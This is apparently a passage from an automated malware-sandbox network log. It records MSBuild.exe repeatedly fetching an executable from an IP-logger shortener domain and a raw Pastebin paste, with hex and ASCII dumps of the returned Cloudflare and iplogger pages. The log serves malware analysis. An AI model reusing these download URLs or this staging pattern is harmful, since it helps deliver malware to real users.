65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 Data Ascii: 1136<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
2024-09-16 19:23:29 UTC	1369	IN	Data Raw: 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 61 6c 65 72 74 20 63 66 2d 61 6c 65 72 74 2d 65 72 72 6f 72 20 63 66 2d 63 6f 6f 6b 69 65 2d 65 72 72 6f 72 22 20 69 64 3d 22 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 65 6e 61 62 6c 65 5f 63 6f 6f 6b 69 65 73 22 3e 50 6c 65 61 73 65 20 65 6e 61 62 6c 65 20 63 6f 6f 6b 69 65 73 2e 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 22 20 63 6c 61 73 73 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 2d 77 72 61 70 70 65 72 Data Ascii: !--<![endif]--></head><body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper
2024-09-16 19:23:29 UTC	1369	IN	Data Raw: 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 20 63 66 2d 62 74 6e 2d 64 61 6e 67 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 62 64 32 34 32 36 3b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 64 69 73 6d 69 73 73 5f 61 6e 64 5f 65 6e 74 65 72 22 3e 49 67 6e 6f 72 65 20 26 20 50 72 6f 63 65 65 64 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 66 6f 72 6d 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 Data Ascii: re</a> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div
2024-09-16 19:23:29 UTC	529	IN	Data Raw: 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 2d 69 70 22 29 2c 63 3d 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 22 29 3b 62 26 26 22 63 6c 61 73 73 4c 69 73 74 22 69 6e 20 62 26 26 28 62 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 2c 63 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 6c 69 63 6b 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 63 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 68 69 64 64 65 6e 22 29 3b 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 29 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 7d 29 29 7d 76 Data Ascii: etElementById("cf-footer-item-ip"),c=a.getElementById("cf-footer-ip-reveal");b&&"classList"in b&&(b.classList.remove("hidden"),c.addEventListener("click",function(){c.classList.add("hidden");a.getElementById("cf-footer-ip").classList.remove("hidden")}))}v
2024-09-16 19:23:29 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
58	192.168.2.6	49788	188.114.97.3	443	1340	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-16 19:23:29 UTC	65	OUT	GET /RNWPd.exe HTTP/1.1 Host: yip.su Connection: Keep-Alive
2024-09-16 19:23:30 UTC	898	IN	HTTP/1.1 200 OK Date: Mon, 16 Sep 2024 19:23:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close memory: 0.36197662353515625 expires: Mon, 16 Sep 2024 19:23:29 +0000 strict-transport-security: max-age=604800 strict-transport-security: max-age=31536000 content-security-policy: img-src https: data:; upgrade-insecure-requests x-frame-options: SAMEORIGIN Cache-Control: max-age=14400 CF-Cache-Status: EXPIRED Last-Modified: Mon, 16 Sep 2024 19:23:29 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7sE1tYIH0I5k1m5aqcjQcBUryL%2FKjoC9OYA29N84SuIein65Jz3RJHfy2Y7ufJz5yscN8j8qd83d2qn7Wbnh2%2BvlGhX2rlPs3Zrm6PxdvsxrIhGcyjmvb4c%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c433b37cac44309-EWR alt-svc: h3=":443"; ma=86400
2024-09-16 19:23:30 UTC	471	IN	Data Raw: 31 64 32 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 22 20 63 6c 61 73 73 3d 22 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c Data Ascii: 1d26<!DOCTYPE html><html lang="" class="html"><head><title></title><meta http-equiv="content-type" content="text/html; charset=utf-8" /><meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width,
2024-09-16 19:23:30 UTC	1369	IN	Data Raw: 72 22 20 63 6f 6e 74 65 6e 74 3d 22 37 20 64 61 79 73 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 73 68 6f 72 74 65 6e 65 72 2c 20 69 70 6c 6f 67 67 65 72 2c 20 73 68 6f 72 74 6c 69 6e 6b 2c 20 75 72 6c 2c 20 64 6f 6d 61 69 6e 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 69 70 6c 6f 67 67 65 72 2e 6f 72 67 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d Data Ascii: r" content="7 days" /><meta name="keywords" content="shortener, iplogger, shortlink, url, domain" /><meta name="description" content="" /><link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" /><meta property=
2024-09-16 19:23:30 UTC	1369	IN	Data Raw: 6c 6f 72 3a 23 33 33 38 62 64 39 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 6d 61 72 67 69 6e 3a 32 35 70 78 20 35 70 78 20 30 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 32 29 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 32 73 3b 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 32 73 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 33 29 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e Data Ascii: lor:#338bd9;display:inline-block;margin:25px 5px 0;-webkit-animation:jump 1s linear infinite;animation:jump 1s linear infinite}#loader>span:nth-child(2){-webkit-animation-delay:0.2s;animation-delay:0.2s}#loader>span:nth-child(3){-webkit-animation-delay:0.
2024-09-16 19:23:30 UTC	1369	IN	Data Raw: 67 65 6e 74 44 61 74 61 2e 70 6c 61 74 66 6f 72 6d 3d 3d 3d 27 57 69 6e 64 6f 77 73 27 29 7b 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 44 61 74 61 2e 67 65 74 48 69 67 68 45 6e 74 72 6f 70 79 56 61 6c 75 65 73 28 5b 27 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 27 5d 29 2e 74 68 65 6e 28 75 61 3d 3e 7b 5f 70 3d 70 61 72 73 65 49 6e 74 28 75 61 2e 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 2e 73 70 6c 69 74 28 27 2e 27 29 5b 30 5d 29 7d 29 7d 0a 09 76 61 72 20 5f 79 3d 5b 5d 2c 5f 7a 3d 7b 7d 2c 5f 78 3d 66 75 6e 63 74 69 6f 6e 28 6e 61 6d 65 2c 64 61 74 61 2c 6e 29 7b 69 66 28 74 79 70 65 6f 66 28 64 61 74 61 29 21 3d 3d 27 6f 62 6a 65 63 74 27 29 7b 64 61 74 61 3d 7b 7d 7d 3b 6e 3d 5f 79 2e 69 6e 64 65 78 4f 66 28 6e 61 6d 65 29 3b 5f Data Ascii: gentData.platform==='Windows'){navigator.userAgentData.getHighEntropyValues(['platformVersion']).then(ua=>{_p=parseInt(ua.platformVersion.split('.')[0])})}var _y=[],_z={},_x=function(name,data,n){if(typeof(data)!=='object'){data={}};n=_y.indexOf(name);_
2024-09-16 19:23:30 UTC	1369	IN	Data Raw: 79 6c 65 3e 0a 2e 77 72 61 70 70 65 72 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 30 70 78 7d 2e 63 6f 6e 74 61 69 6e 65 72 7b 77 69 64 74 68 3a 34 34 30 70 78 3b 6d 69 6e 2d 77 69 64 74 68 3a 33 32 30 70 78 3b 68 65 69 67 68 74 3a 33 35 30 70 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 6d 73 2d 66 6c 65 78 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6c 65 78 2d 77 72 61 70 3a 77 72 61 70 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 62 6f 72 64 65 72 2d 72 61 Data Ascii: yle>.wrapper{margin-top:100px}.container{width:440px;min-width:320px;height:350px;display:-ms-flexbox;display:flex;-ms-flex-align:center;align-items:center;-ms-flex-pack:center;justify-content:center;text-align:center;flex-wrap:wrap;margin:auto;border-ra
2024-09-16 19:23:30 UTC	1369	IN	Data Raw: 61 72 67 69 6e 3a 61 75 74 6f 7d 2e 6c 6f 67 6f 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 63 6f 6c 6f 72 3a 23 30 37 34 64 37 63 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 70 65 72 22 3e 0a 0a 20 20 20 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 65 61 64 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 6f 6d 61 69 6e 22 3e 0a 09 09 09 09 3c 64 69 76 20 69 64 3d 22 64 6f Data Ascii: argin:auto}.logo .logo-text{color:#074d7c;text-align:center;font-size:12px;white-space:nowrap;font-family:arial;font-weight:700}</style><div class="wrapper"> <div class="container"> <div class="header"><div class="domain"><div id="do
2024-09-16 19:23:30 UTC	154	IN	Data Raw: 2e 70 6f 73 69 74 69 6f 6e 3d 27 61 62 73 6f 6c 75 74 65 27 2c 61 2e 73 74 79 6c 65 2e 74 6f 70 3d 69 2c 61 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 69 2c 61 2e 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 75 6e 74 65 72 2e 79 61 64 72 6f 2e 72 75 2f 68 69 74 3f 27 2b 75 72 6c 2e 6a 6f 69 6e 28 27 3b 27 29 2c 64 2e 62 6f 64 79 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 61 29 3b 0a 09 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: .position='absolute',a.style.top=i,a.style.left=i,a.src='https://counter.yadro.ru/hit?'+url.join(';'),d.body.appendChild(a);</script></body></html>
2024-09-16 19:23:30 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
59	192.168.2.6	49789	104.20.4.235	443	1340	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-16 19:23:34 UTC	74	OUT	GET /raw/V6VJsrV3 HTTP/1.1 Host: pastebin.com Connection: Keep-Alive
2024-09-16 19:23:35 UTC	222	IN	HTTP/1.1 200 OK Date: Mon, 16 Sep 2024 19:23:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Server: cloudflare CF-RAY: 8c433b57bf017ca8-EWR
2024-09-16 19:23:35 UTC	1147	IN	Data Raw: 31 31 33 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 Data Ascii: 1136<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
2024-09-16 19:23:35 UTC	1369	IN	Data Raw: 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 61 6c 65 72 74 20 63 66 2d 61 6c 65 72 74 2d 65 72 72 6f 72 20 63 66 2d 63 6f 6f 6b 69 65 2d 65 72 72 6f 72 22 20 69 64 3d 22 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 65 6e 61 62 6c 65 5f 63 6f 6f 6b 69 65 73 22 3e 50 6c 65 61 73 65 20 65 6e 61 62 6c 65 20 63 6f 6f 6b 69 65 73 2e 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 22 20 63 6c 61 73 73 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 2d 77 72 61 70 70 65 72 Data Ascii: !--<![endif]--></head><body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper
2024-09-16 19:23:35 UTC	1369	IN	Data Raw: 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 20 63 66 2d 62 74 6e 2d 64 61 6e 67 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 62 64 32 34 32 36 3b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 64 69 73 6d 69 73 73 5f 61 6e 64 5f 65 6e 74 65 72 22 3e 49 67 6e 6f 72 65 20 26 20 50 72 6f 63 65 65 64 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 66 6f 72 6d 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 Data Ascii: re</a> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div
2024-09-16 19:23:35 UTC	529	IN	Data Raw: 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 2d 69 70 22 29 2c 63 3d 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 22 29 3b 62 26 26 22 63 6c 61 73 73 4c 69 73 74 22 69 6e 20 62 26 26 28 62 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 2c 63 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 6c 69 63 6b 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 63 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 68 69 64 64 65 6e 22 29 3b 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 29 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 7d 29 29 7d 76 Data Ascii: etElementById("cf-footer-item-ip"),c=a.getElementById("cf-footer-ip-reveal");b&&"classList"in b&&(b.classList.remove("hidden"),c.addEventListener("click",function(){c.classList.add("hidden");a.getElementById("cf-footer-ip").classList.remove("hidden")}))}v
2024-09-16 19:23:35 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
60	192.168.2.6	49790	188.114.97.3	443	1340	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-16 19:23:35 UTC	65	OUT	GET /RNWPd.exe HTTP/1.1 Host: yip.su Connection: Keep-Alive
2024-09-16 19:23:35 UTC	900	IN	HTTP/1.1 200 OK Date: Mon, 16 Sep 2024 19:23:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close memory: 0.36197662353515625 expires: Mon, 16 Sep 2024 19:23:35 +0000 strict-transport-security: max-age=604800 strict-transport-security: max-age=31536000 content-security-policy: img-src https: data:; upgrade-insecure-requests x-frame-options: SAMEORIGIN Cache-Control: max-age=14400 CF-Cache-Status: EXPIRED Last-Modified: Mon, 16 Sep 2024 19:23:35 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vC64GAHq9o8l0bmgH7bbCvNtJ1hYfYmpQsdtHvZcVr1oC2sYvmtjnKUErZLp9mMrt%2BUEi%2FCTGX%2FuHaAepPUdWTftvBPNXGl5iVWjjoKzmcBIb2dasNuGhPo%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c433b5bcf887d00-EWR alt-svc: h3=":443"; ma=86400
2024-09-16 19:23:35 UTC	469	IN	Data Raw: 31 64 32 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 22 20 63 6c 61 73 73 3d 22 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c Data Ascii: 1d26<!DOCTYPE html><html lang="" class="html"><head><title></title><meta http-equiv="content-type" content="text/html; charset=utf-8" /><meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width,
2024-09-16 19:23:35 UTC	1369	IN	Data Raw: 74 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 37 20 64 61 79 73 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 73 68 6f 72 74 65 6e 65 72 2c 20 69 70 6c 6f 67 67 65 72 2c 20 73 68 6f 72 74 6c 69 6e 6b 2c 20 75 72 6c 2c 20 64 6f 6d 61 69 6e 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 69 70 6c 6f 67 67 65 72 2e 6f 72 67 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 Data Ascii: ter" content="7 days" /><meta name="keywords" content="shortener, iplogger, shortlink, url, domain" /><meta name="description" content="" /><link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" /><meta propert
2024-09-16 19:23:35 UTC	1369	IN	Data Raw: 63 6f 6c 6f 72 3a 23 33 33 38 62 64 39 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 6d 61 72 67 69 6e 3a 32 35 70 78 20 35 70 78 20 30 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 32 29 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 32 73 3b 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 32 73 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 33 29 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a Data Ascii: color:#338bd9;display:inline-block;margin:25px 5px 0;-webkit-animation:jump 1s linear infinite;animation:jump 1s linear infinite}#loader>span:nth-child(2){-webkit-animation-delay:0.2s;animation-delay:0.2s}#loader>span:nth-child(3){-webkit-animation-delay:
2024-09-16 19:23:35 UTC	1369	IN	Data Raw: 72 41 67 65 6e 74 44 61 74 61 2e 70 6c 61 74 66 6f 72 6d 3d 3d 3d 27 57 69 6e 64 6f 77 73 27 29 7b 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 44 61 74 61 2e 67 65 74 48 69 67 68 45 6e 74 72 6f 70 79 56 61 6c 75 65 73 28 5b 27 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 27 5d 29 2e 74 68 65 6e 28 75 61 3d 3e 7b 5f 70 3d 70 61 72 73 65 49 6e 74 28 75 61 2e 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 2e 73 70 6c 69 74 28 27 2e 27 29 5b 30 5d 29 7d 29 7d 0a 09 76 61 72 20 5f 79 3d 5b 5d 2c 5f 7a 3d 7b 7d 2c 5f 78 3d 66 75 6e 63 74 69 6f 6e 28 6e 61 6d 65 2c 64 61 74 61 2c 6e 29 7b 69 66 28 74 79 70 65 6f 66 28 64 61 74 61 29 21 3d 3d 27 6f 62 6a 65 63 74 27 29 7b 64 61 74 61 3d 7b 7d 